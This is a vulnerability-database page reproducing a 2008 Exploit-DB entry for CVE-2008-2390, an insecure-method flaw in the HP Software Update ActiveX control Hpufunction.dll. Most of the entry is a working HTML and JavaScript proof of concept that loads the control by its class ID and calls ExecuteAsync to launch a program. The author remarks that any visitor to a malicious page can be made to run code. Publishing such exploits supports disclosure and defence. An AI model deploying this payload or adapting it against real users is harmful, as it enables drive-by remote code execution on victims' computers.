Lucene search
+L

HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method

🗓️ 27 Apr 2008 00:00:00Reported by callAXType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method allows remote code executio

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-2390
27 Apr 200800:00
circl
cve
CVE
CVE-2008-2390
21 May 200810:00
cve
cvelist
Cvelist
CVE-2008-2390
21 May 200810:00
cvelist
euvd
EUVD
EUVD-2008-2385
7 Oct 202500:30
euvd
kaspersky
Kaspersky
KLA10192 ACE vulnerability in HP Software Update
21 May 200800:00
kaspersky
nvd
NVD
CVE-2008-2390
21 May 200813:24
nvd
prion
Prion
Code injection
21 May 200813:24
prion
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Insecure Methods in HP Update Software.
Remote: Yes
Execute code remotely is possible using methods ExecuteAsync and Execute  :-)
If a user visits the malicious page the attacker can execute code.
Coded by callAX
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Proof of Concept
----------------


<HTML>
<BODY>
<object id=boom classid="clsid:{B00FBC78-73CB-4216-8D01-96770CC020C3}"></object>
<SCRIPT language="javascript">


function Do_it()
{
  var Please = "c:\\windows\\system32\\calc.exe"
  var Give = "doest_matter"
  var Me = "c:\\"
  var Freedom  = 1;

  boom.ExecuteAsync (Please, Give, Me ,Freedom);
}


</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Poc">
</BODY>
</HTML>

# milw0rm.com [2008-04-27]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.06861
33